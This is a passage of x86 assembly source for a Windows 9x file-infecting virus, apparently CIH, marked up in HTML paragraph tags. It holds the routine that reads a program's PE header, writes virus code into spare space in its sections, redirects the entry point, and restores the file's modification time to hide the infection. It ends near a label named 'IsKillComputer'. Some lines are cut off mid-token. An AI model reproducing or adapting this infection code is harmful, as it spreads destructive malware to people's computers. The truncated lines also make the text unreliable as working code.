<P>; * | ESP | *</P>
<P>; * ------------------------- *</P>
<P>; * | EBX | *</P>
<P>; * ------------------------- *</P>
<P>; * | EDX | *</P>
<P>; * ------------------------- *</P>
<P>; * | ECX | *</P>
<P>; * ------------------------- *</P>
<P>; * | EAX | *</P>
<P>; * ------------------------- *</P>
<P>; * | Return Address | *</P>
<P>; * ------------------------- *</P>
<P>; *************************************</P>
<P> </P>
<P>push ebx ; Save File Handle</P>
<P> </P>
<P>push 00h ; Set VirusCodeSectionTableEndMark</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * Virus' Infected Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>push 01h ; Size</P>
<P>push edx ; Pointer of File</P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Save ESP Register *</P>
<P>; ***************************</P>
<P> </P>
<P>mov dr1, esp</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * NewAddressOfEntryPoint *</P>
<P>; * ( Only First Set Size ) *</P>
<P>; ***************************</P>
<P> </P>
<P>push eax ; Size</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Read *</P>
<P>; * Image Header in File *</P>
<P>; ***************************</P>
<P> </P>
<P>mov eax, ebp</P>
<P>mov cl, SizeOfImageHeaderToRead</P>
<P>add edx, 07h ; Move EDX to NumberOfSections</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * NewAddressOfEntryPoint *</P>
<P>; * ( Set Pointer of File, *</P>
<P>; * Address of Buffer ) *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, (AddressOfEntryPoint-@8)[edx]</P>
<P>push eax ; Pointer of File</P>
<P> </P>
<P>lea eax, (NewAddressOfEntryPoint-@8)[esi]</P>
<P>push eax ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Move EDX to the Start *</P>
<P>; * of SectionTable in File *</P>
<P>; ***************************</P>
<P> </P>
<P>movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]</P>
<P>lea edx, [eax+edx+12h]</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Get *</P>
<P>; * Total Size of Sections *</P>
<P>; ***************************</P>
<P> </P>
<P>mov al, SizeOfScetionTable</P>
<P> </P>
<P>; I Assume NumberOfSections <= 0ffh</P>
<P>mov cl, (NumberOfSections-@8)[esi]</P>
<P>; * Address of Entry Point *</P>
<P>; ***************************</P>
<P> </P>
<P>; Save My Virus First Section Code</P>
<P>; Size of Following Section Table...</P>
<P>; ( Not Include the Size of Virus Code Section Table )</P>
<P>push ecx</P>
<P> </P>
<P>xchg ecx, eax ; ECX = Size of Section Table</P>
<P> </P>
<P>mov eax, (AddressOfEntryPoint-@9)[esi]</P>
<P>add eax, (ImageBase-@9)[esi]</P>
<P>mov (OriginalAddressOfEntryPoint-@9)[esi], eax</P>
<P> </P>
<P>; ***************************</P>
<P>; * Read All Section Tables *</P>
<P>; ***************************</P>
<P> </P>
<P>mov eax, ebp</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set Total Virus *</P>
<P>; * Code Section Table *</P>
<P>; ***************************</P>
<P> </P>
<P>; EBX = My Virus First Section Code</P>
<P>; Size of Following Section Table</P>
<P>pop ebx</P>
<P>pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl</P>
<P>pop ecx ; ECX = NumberOfSections+1</P>
<P> </P>
<P>push edi ; Size</P>
<P> </P>
<P>add edx, eax</P>
<P>push edx ; Pointer of File</P>
<P> </P>
<P>add eax, esi</P>
<P>push eax ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Set the First Virus *</P>
<P>; * Code Section Size in *</P>
<P>; * VirusCodeSectionTable *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, [eax+edi-04h]</P>
<P>mov [eax], ebx</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set My Virus *</P>
<P>; * First Section Code *</P>
<P>; ***************************</P>
<P> </P>
<P>push ebx ; Size</P>
<P> </P>
<P>add edx, edi</P>
<P>push edx ; Pointer of File</P>
<P> </P>
<P>lea edi, (MyVirusStart-@9)[esi]</P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Modify the *</P>
<P>; * AddressOfEntryPoint to *</P>
<P>; * My Virus Entry Point *</P>
<P>; ***************************</P>
<P> </P>
<P>mov (NewAddressOfEntryPoint-@9)[esi], edx</P>
<P> </P>
<P>; ***************************</P>
<P>; * Setup Initial Data *</P>
<P>; ***************************</P>
<P> </P>
<P>lea edx, [esi-SizeOfScetionTable]</P>
<P>mov ebp, offset VirusSize</P>
<P> </P>
<P>jmp StartToWriteCodeToSections</P>
<P> </P>
<P>; ***************************</P>
<P>; * Write Code to Sections *</P>
<P>; ***************************</P>
<P> </P>
<P>LoopOfWriteCodeToSections:</P>
<P> </P>
<P>add edx, SizeOfScetionTable</P>
<P> </P>
<P>mov ebx, (SizeOfRawData-@9)[edx]</P>
<P>sub ebx, (VirtualSize-@9)[edx]</P>
<P>jbe EndOfWriteCodeToSections</P>
<P> </P>
<P>push ebx ; Size</P>
<P> </P>
<P>sub eax, 08h</P>
<P>mov [eax], ebx</P>
<P> </P>
<P>mov ebx, (PointerToRawData-@9)[edx]</P>
<P>add ebx, (VirtualSize-@9)[edx]</P>
<P>push ebx ; Pointer of File</P>
<P> </P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>mov ebx, (VirtualSize-@9)[edx]</P>
<P>add ebx, (VirtualAddress-@9)[edx]</P>
<P>add ebx, (ImageBase-@9)[esi]</P>
<P>mov [eax+4], ebx</P>
<P> </P>
<P>mov ebx, [eax]</P>
<P>add (VirtualSize-@9)[edx], ebx</P>
<P> </P>
<P>; Section contains initialized data ==> 00000040h</P>
<P>; Section can be Read. ==> 40000000h</P>
<P>or (Characteristics-@9)[edx], 40000040h</P>
<P> </P>
<P>StartToWriteCodeToSections:</P>
<P> </P>
<P>sub ebp, ebx</P>
<P>jbe SetVirusCodeSectionTableEndMark</P>
<P> </P>
<P>add edi, ebx ; Move Address of Buffer</P>
<P> </P>
<P>EndOfWriteCodeToSections:</P>
<P> </P>
<P>loop LoopOfWriteCodeToSections</P>
<P> </P>
<P>; ***************************</P>
<P>; * Only Set Infected Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>OnlySetInfectedMark:</P>
<P>mov esp, dr1</P>
<P> </P>
<P>jmp WriteVirusCodeToFile</P>
<P> </P>
<P>; ***************************</P>
<P>; * Set Virus Code *</P>
<P>; * Section Table End Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>SetVirusCodeSectionTableEndMark:</P>
<P> </P>
<P>; Adjust Size of Virus Section Code to Correct Value</P>
<P>add [eax], ebp</P>
<P>add [esp+08h], ebp</P>
<P> </P>
<P>; Set End Mark</P>
<P>xor ebx, ebx</P>
<P>mov [eax-04h], ebx</P>
<P> </P>
<P>; ***************************</P>
<P>; * When VirusGame Calls *</P>
<P>; * VxDCall, VMM Modifies *</P>
<P>; * the 'int 20h' and the *</P>
<P>; * 'Service Identifier' *</P>
<P>; * to 'Call [XXXXXXXX]'. *</P>
<P>; ***************************</P>
<P>; * Before Writing My Virus *</P>
<P>; * to File, I Must Restore *</P>
<P>; * them First. ^__^ *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, (LastVxDCallAddress-2-@9)[esi]</P>
<P> </P>
<P>mov cl, VxDCallTableSize</P>
<P> </P>
<P>LoopOfRestoreVxDCallID:</P>
<P>mov word ptr [eax], 20cdh</P>
<P> </P>
<P>mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]</P>
<P>mov [eax+2], edx</P>
<P> </P>
<P>movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es</P>
<P> </P>
<P>sub eax, edx</P>
<P> </P>
<P>loop LoopOfRestoreVxDCallID</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Write *</P>
<P>; * Virus Code to the File *</P>
<P>; ***************************</P>
<P> </P>
<P>WriteVirusCodeToFile:</P>
<P>mov eax, dr1</P>
<P>mov ebx, [eax+10h]</P>
<P>mov edi, [eax]</P>
<P> </P>
<P>LoopOfWriteVirusCodeToFile:</P>
<P> </P>
<P>pop ecx</P>
<P>jecxz SetFileModificationMark</P>
<P> </P>
<P>mov esi, ecx</P>
<P>mov eax, 0d601h</P>
<P>pop edx</P>
<P>pop ecx</P>
<P> </P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>jmp LoopOfWriteVirusCodeToFile</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set CF = 1 ==> *</P>
<P>; * Need to Restore File *</P>
<P>; * Modification Time *</P>
<P>; ***************************</P>
<P> </P>
<P>SetFileModificationMark:</P>
<P>pop ebx</P>
<P>pop eax</P>
<P> </P>
<P>stc ; Enable CF(Carry Flag)</P>
<P>pushf</P>
<P> </P>
<P>; *************************************</P>
<P>; * Close File *</P>
<P>; *************************************</P>
<P> </P>
<P>CloseFile:</P>
<P>xor eax, eax</P>
<P>mov ah, 0d7h</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; *************************************</P>
<P>; * Need to Restore File Modification *</P>
<P>; * Time !? *</P>
<P>; *************************************</P>
<P> </P>
<P>popf</P>
<P>pop esi</P>
<P>jnc IsKillComputer</P>
<P> </P>
<P>; *************************************</P>
<P>; * Restore File Modification Time *</P>
<P>; *************************************</P>
<P> </P>
<P>mov ebx, edi</P>
<P> </P>
<P>mov ax, 4303h</P>
<P>mov ecx, (FileModificationTime-@7)[esi]</P>
<P>mov edi, (FileModificationTime+2-@7)[esi]</P>
<P>call ebx ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; *************************************</P>
<P>; * Disable OnBusy *</P>
<P>; *************************************</P>
<P> </P>
<P>DisableOnBusy:</P>
<P>dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus</P>
<P> </P>
<P>; *************************************</P>
<P>; * Call Previous FileSystemApiHook *</P>
<P>; *************************************</P>
<P> </P>
<P>prevhook:</P>
<P>popad</P>
<P> </P>
<P>mov eax, dr0 ;</P>